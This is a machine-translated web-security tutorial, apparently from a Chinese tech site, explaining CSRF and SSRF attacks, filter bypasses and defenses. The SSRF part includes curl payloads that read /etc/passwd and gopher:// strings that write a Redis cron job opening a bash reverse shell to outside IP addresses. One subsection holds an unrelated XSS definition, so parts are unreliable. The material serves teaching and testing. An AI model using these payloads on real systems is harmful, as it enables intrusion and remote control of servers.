Shulou(Shulou.com)06/01 Report--

This article mainly explains "what are the CSRF vulnerabilities in WEB security penetration testing". The explanation in this article is simple and clear and easy to learn and understand. Please follow the editor's train of thought to study and learn "what are the CSRF vulnerabilities in WEB security penetration testing"?

CSRF vulnerability

3.3.1. Brief introduction

CSRF (Cross-site request forgery) cross-site request forgery, also known as "One Click Attack" or Session Riding, is usually abbreviated to CSRF, which is a malicious exploitation of a website. Although it sounds like cross-site scripting (XSS), it is very different from XSS, where XSS leverages trusted users within the site, while CSRF leverages trusted sites by masquerading requests from trusted users.

3.3.2. classification

3.3.2.1. Resources contain

Resources contain types that you might see in most demonstrations or basic courses that introduce the concept of CSRF. This type boils down to attackers who control the resources contained in HTML tags (for example, and so on). Any tag that contains a remote resource can complete the attack if the attacker can influence the URL to be loaded.

Due to the lack of source point checks for Cookie, as mentioned above, this attack does not require XSS and can be performed by any attacker-controlled site or the site itself. This type is limited to GET requests because these are the only request types that browsers have for resource URL. The main limitation of this type is that it requires the incorrect use of secure HTTP requests.

3.3.2.2. Form-based

It is usually seen when using a secure request method correctly. The attacker creates a form that the victim wants to submit; it contains a JavaScript fragment that forces the victim's browser to submit.

The form can be made up entirely of hidden elements, making it difficult for the victim to find it.

If cookies is not handled properly, an attacker can launch an attack at any site, and the attack will succeed as long as the victim logs in with a valid cookie. If the request is purposeful, a successful attack will return the victim to their normal page. This method is particularly effective for phishing attacks where an attacker can point the victim to a specific page.

3.3.2.3. XMLHttpRequest

This is probably the least seen way.

Because many modern Web applications rely on XHR, many applications spend a lot of time building and implementing this particular countermeasure.

XHR-based CSRF usually appears as a XSS payload because of SOP. There is no cross-domain resource sharing policy (CORS), and XHR is limited to the original request that the attacker hosts his own payload.

The attack payload for this type of CSRF is basically a standard XHR, and attackers have found some ways to inject the victim's browser DOM.

3.3.3. Defense

● detects user submissions through CSRF-token or CAPTCHA

● verifies Referer/Content-Type

It is best for ● to use POST operations for user modifications, deletions, etc.

● avoids the common cookie of the whole station and strictly sets the domain of cookie.

3.4

SSRF vulnerability

3.4.1. Brief introduction

Server request forgery (Server Side Request Forgery, SSRF) means that when an attacker fails to obtain the ownership limit of the server, the attacker takes advantage of the server vulnerability to send a constructed request to the server intranet as the server. SSRF attacks usually target internal systems that cannot be directly accessed by external networks.

3.4.2. Vulnerability hazard

SSRF can scan ports in the external network, the intranet where the server is located, and locally, attack applications running on the intranet or local, or use File protocol to read local files.

The defense of intranet services is generally weaker than that of extranet services, and even some intranet services do not set permission verification for intranet access for the convenience of operation and maintenance, so when there is SSRF, it will usually cause great harm.

3.4.3. Utilization mode

SSRF takes advantage of various forms and different scenarios, and different bypass methods can be used for different scenarios.

Take curl as an example. You can use dict protocol to operate Redis, read files with file protocol, and rebound Shell with gopher protocol. Common Payload is as follows:

Curl-vvv\ 'dict://127.0.0.1:6379/info\'

Curl-vvv\ 'file:///etc/passwd\'

# * Note: links use single quotation marks to avoid the problem of $variable

Curl-vvv\ 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * bash-I > & / dev/tcp/103.21.140.84/6789 0 > & 1% 0a% 0a% 0a% 0a% 0a% 0d% 0d% 0a% 0a% 0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a\'

3.4.4. Correlation risk function

The dangerous function involved in SSRF is mainly network access, which supports network reading of pseudo-protocols. Take PHP as an example, the functions involved are file_get_contents () / fsockopen () / curl_exec () and so on.

3.4.5. Filter bypass

3.4.5.1. Change the way IP addresses are written

Some developers will filter out private network IP by regularly matching the passed URL parameters, such as using the following regular expression:

● ^ 10 (. ([2] [0-4] d | [2] [5] [0-5] | [01]? d)) {3} $

● ^ 172.( [1] [6-9] | [2] d | 3 [01]) (. ([2] [0-4] d | [2] [5] [0-5] | [01]? DTD)) {2} $

● ^ 192.168 (. ([2] [0-4] d | [2] [5] [0-5] | [01]? d)) {2} $

We use the method of adapting IP to bypass this kind of filtering. For example, the IP address of 192.168.0.1 can be rewritten as:

● octal format: 0300.0250.0.1

● hexadecimal format: 0xC0.0xA8.0.1

● decimal integer format: 3232235521

● hexadecimal integer format: 0xC0A80001

There is also a special ellipsis mode, such as 10.0.0.1 this IP can be written as 10.1. When accessing the rewritten IP address, Apache will report 400 Bad Request, but other services such as Nginx, MySQL and so on will still work properly. In addition, the 0.0.0.0 IP can be accessed directly locally and is usually omitted by regular filtering.

3.4.5.2. Use domain names that are resolved to the intranet

The full name of XSS is Cross Site Scripting, in order to separate from CSS, it is abbreviated as XSS, and the Chinese name is cross-site script. The vulnerability occurs on the client side and refers to the execution of JavaScript code that is not expected during rendering. XSS is often used to obtain Cookie, operate as an attacker, and so on.

3.4.5.3. Using the analysis of the problems in URL

In some cases, the back-end program may parse the accessed URL and filter the resolved host address. At this point, improper parsing of the URL parameters may occur, resulting in the ability to bypass filtering.

For example, when the back-end program parses the contents of the above URL through incorrect regular expressions (such as the character content after http to com, that is, www.baidu.com, which is considered to be the host address of the access request), it is likely to think that the host accessing URL is www.baidu.com. In fact, all the content requested by this URL is the content on 192.168.0.1.

3.4.5.4. Take advantage of jump

If the back-end server correctly parses the host of URL and filters it after receiving the parameters, we can use the jump method to bypass it at this time.

Services such as http://httpbin.org/redirect-to?url=http://192.168.0.1 can be used to jump, but because URL contains an intranet IP address of 192.168.0.1, it may be filtered out by regular expressions and can be bypassed by short addresses.

The commonly used jump is 302 jump and 307 jump, the difference is that 307 jump will forward the data in the POST request, but 302 jump will not.

3.4.5.5. Through various non-HTTP protocols

If the server-side program verifies the protocol used to access the URL, it can be utilized by a non-HTTP protocol.

For example, through gopher, you can construct a POST or GET request in a url parameter to attack private network applications. For example, you can use gopher protocol to attack Redis services in private network. You can use the following URL:

Gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* bash-I > & / dev/tcp/172.19.23.228/23330 > & 1% 0a% 0a% 0a% 0a% 0a% 0d% 0a% 0d% 0d% 0a4% 0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

In addition to the gopher protocol, the File protocol is also commonly used in SSRF. This protocol is mainly used to access files in the local computer, and we can access local files on the computer through a format similar to file:///path/to/file. Using the file protocol can avoid the filtering of the IP accessed by the server program. For example, we can access the contents of 1.txt in D disk through file:///d:/1.txt.

3.4.5.6. DNS Rebinding

A common defense idea is: for the URL parameters requested by the user, the server will first parse the DNS, and then judge the IP address returned by the DNS server. If it is in the blacklist, the request will be prohibited.

However, in the whole process, there is a time difference between the first request for DNS service for domain name resolution and the second server request for URL. Using this time difference, we can carry out DNS rebinding attack.

To complete the DNS rebinding attack, we need a domain name and specify the resolution of this domain name to our own DNS Server, write the resolution service on our controllable DNS Server, and set the TTL time to 0. In this way, the attack can be carried out. The complete attack process is as follows:

The ● server obtains the URL parameter, carries on the first DNS parsing, and obtains a non-intranet IP.

If ● judges the obtained IP and finds it to be a non-blacklist IP, it passes the verification.

The ● server accesses the URL, and because the TTL set by the DNS server is 0, the DNS resolution is performed again, and this time the DNS server returns the private network address.

● has bypassed verification, so the server returns the result of accessing private network resources.

3.4.5.7. Using IPv6

Some services do not take IPv6 into account, but the private network supports IPv6, so you can use the local IP of IPv6, such as [:] 0000IP 1 or the private network domain name of IPv6, to bypass filtering.

3.4.5.8. Using IDN

Some network access tools, such as Curl, support internationalized domain names (Internationalized Domain Name,IDN). Internationalized domain names, also known as special character domain names, refer to Internet domain names composed of some or all special characters or letters.

Some of these characters are converted equivalently when accessed, such as ⓔⓧⓐⓜⓟⓛⓔ. ⓒⓞⓜ and example.com In this way, intranet restrictions can be bypassed with characters such as ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩.

3.4.6. Possible point of use

● ftp, ftps (FTP blasting)

● sftp

● tftp (UDP Protocol extension)

● dict

● gopher

● ldap

● imap/imaps/pop3/pop3s/smtp/smtps (burst email username and password)

● rtsp-smb/smbs (connect SMB)

● telnet

● http 、 https

● mongodb

● ShellShock command execution

● JBOSS remote Invoker war command execution

● Java debug interface command execution

● axis2-admin deployment Server command execution

● Jenkins Scripts interface command execution

● Confluence SSRF

● Struts2 command execution

● counchdb WEB API remote command execution

● docker API remote command execution

● php_fpm/fastcgi command execution

● tomcat command execution

● Elasticsearch engine Groovy script command execution

● WebDav PUT uploads any file

● WebSphere Admin deploys war indirect command execution

● Apache Hadoop remote command execution

● zentoPMS remote command execution

● HFS remote command execution

● glassfish arbitrary file read and war file deployment indirect command execution

3.4.7. Defense mode

● filter the returned information

● Unified error message

● restricts the requested port

● prohibits protocols that are not commonly used

● versus DNS Rebinding, consider using DNS cache or Host whitelist

Thank you for reading, the above is the content of "what is the CSRF vulnerability in the WEB security penetration test". After the study of this article, I believe you have a deeper understanding of what the CSRF vulnerability in the WEB security penetration test is, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.